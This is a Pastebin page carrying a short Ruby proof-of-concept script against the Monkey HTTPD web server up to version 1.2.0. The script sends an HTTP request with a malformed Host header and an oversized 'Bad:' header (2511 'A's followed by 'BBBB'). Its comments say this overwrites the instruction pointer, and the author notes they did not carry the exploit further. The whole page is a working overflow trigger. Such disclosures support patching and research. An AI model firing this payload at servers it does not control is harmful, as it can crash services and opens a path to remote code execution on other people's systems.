Guest User

Untitled

a guest
May 30th, 2013
141
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env ruby
  2. #
  3. # Demonstrates a buffer overflow in Monkey HTTPD <= 1.2.0
  4. #
  5. # The '\r\n' after the Host header seems to be necessary, as well as the
  6. # 'localhost\r\n' after it. On my system, the offset of 2511 overwrites eip
  7. # perfectly with 'BBBB'. I wasn't able to exploit this further, but it might
  8. # be possible.
  9.  
  10. require 'socket'
  11.  
  12. host = 'localhost'
  13. port = 2001
  14.  
  15. s = TCPSocket.open(host, port)
  16.  
  17. buf = "GET / HTTP/1.1\r\n"
  18. buf << "Host: " + "\r\n"
  19. buf << "localhost\r\n"
  20. buf << "Bad: "
  21. buf << "A" * 2511
  22. buf << "B" * 4
  23. buf << "\r\n\r\n\r\n"
  24.  
  25. s.puts(buf)
RAW Paste Data